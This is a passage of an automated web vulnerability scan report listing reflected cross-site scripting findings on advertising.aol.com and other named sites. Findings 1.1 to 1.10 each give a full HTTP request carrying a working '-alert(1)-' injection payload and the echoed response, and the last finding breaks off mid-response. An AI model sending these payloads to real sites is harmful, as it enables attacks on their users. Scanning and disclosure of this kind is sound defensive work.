1.327. http://www.networkadvertising.org/managing/optout_results.asp [yahoo_token parameter]

1.328. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

1.329. http://www.lavasoft.com/mylavasoft/login [Referer HTTP header]

1.330. http://www.lavasoft.com/mylavasoft/login [Referer HTTP header]

1.331. http://advertising.aol.com/nai/nai.php [token_nai_ad_us-ec_adtechus_com cookie]

1.332. http://advertising.aol.com/nai/nai.php [token_nai_adserver_adtechus_com cookie]

1.333. http://advertising.aol.com/nai/nai.php [token_nai_adserverec_adtechus_com cookie]

1.334. http://advertising.aol.com/nai/nai.php [token_nai_adserverwc_adtechus_com cookie]

1.335. http://advertising.aol.com/nai/nai.php [token_nai_adsonar_com cookie]

1.336. http://advertising.aol.com/nai/nai.php [token_nai_adtech_de cookie]

1.337. http://advertising.aol.com/nai/nai.php [token_nai_advertising_com cookie]

1.338. http://advertising.aol.com/nai/nai.php [token_nai_glb_adtechus_com cookie]

1.339. http://advertising.aol.com/nai/nai.php [token_nai_tacoda_at_atwola_com cookie]

1.340. http://open.ad.yieldmanager.net/V1/NWSetter [url parameter]

1.341. http://www.marketwatch.com/subjects/oil [BIZO cookie]

1.342. http://www.marketwatch.com/subjects/oil [BIZO cookie]

1.343. http://www.marketwatch.com/subjects/oil [rsi_csl cookie]

1.344. http://www.marketwatch.com/subjects/oil [rsi_csl cookie]

1. Cross-site scripting (reflected)
There are 344 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://advertising.aol.com/finish/0/4/1/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/0/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c985d"-alert(1)-"bb754d1e1d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c985d"-alert(1)-"bb754d1e1d4/0/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:49:56 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Last-Modified: Wed, 07 Sep 2011 12:49:24 GMT
ETag: "e8afd304ce25a4fe58344b5aca47c267"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Content-Length: 28095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/c985d"-alert(1)-"bb754d1e1d4/0/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

1.2. http://advertising.aol.com/finish/1/4/1/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/1/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cafc2"-alert(1)-"32fb95a1715 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cafc2"-alert(1)-"32fb95a1715/1/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:50:01 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:50:01 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/cafc2"-alert(1)-"32fb95a1715/1/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

1.3. http://advertising.aol.com/finish/2/4/1/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/2/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51c50"-alert(1)-"5b17dd630f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /51c50"-alert(1)-"5b17dd630f5/2/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:47:39 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:47:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/51c50"-alert(1)-"5b17dd630f5/2/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

1.4. http://advertising.aol.com/finish/4/4/1/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/4/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62241"-alert(1)-"41856d58a51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /62241"-alert(1)-"41856d58a51/4/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:49:10 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Last-Modified: Wed, 07 Sep 2011 12:48:42 GMT
ETag: "3538488a391f1768268f673617ef149a"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Content-Length: 28095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/62241"-alert(1)-"41856d58a51/4/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

1.5. http://advertising.aol.com/finish/5/4/1/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/5/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4aa89"-alert(1)-"2c267392a85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /4aa89"-alert(1)-"2c267392a85/5/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:47:43 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:47:43 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/4aa89"-alert(1)-"2c267392a85/5/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

1.6. http://advertising.aol.com/finish/6/4/1/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/6/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8be0e"-alert(1)-"eeace66c30c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /8be0e"-alert(1)-"eeace66c30c/6/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:49:19 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:49:19 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/8be0e"-alert(1)-"eeace66c30c/6/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

1.7. http://advertising.aol.com/finish/7/4/1/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/7/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c701"-alert(1)-"60f51ac54d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /4c701"-alert(1)-"60f51ac54d2/7/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:49:18 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:49:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/4c701"-alert(1)-"60f51ac54d2/7/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

1.8. http://advertising.aol.com/finish/8/4/1/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/8/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7ad6"-alert(1)-"ce67ab6b923 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c7ad6"-alert(1)-"ce67ab6b923/8/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:48:27 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:48:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/c7ad6"-alert(1)-"ce67ab6b923/8/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

1.9. http://advertising.aol.com/nai/nai.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5431"-alert(1)-"ecc4042015f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /naib5431"-alert(1)-"ecc4042015f/nai.php?action_id=3 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:03 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:27:03 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/naib5431"-alert(1)-"ecc4042015f/nai.php?action_id=3";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javas
...[SNIP]...

1.10. http://advertising.aol.com/nai/nai.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99290"-alert(1)-"21295270dc0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/nai.php99290"-alert(1)-"21295270dc0?action_id=3 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:24 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:27:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
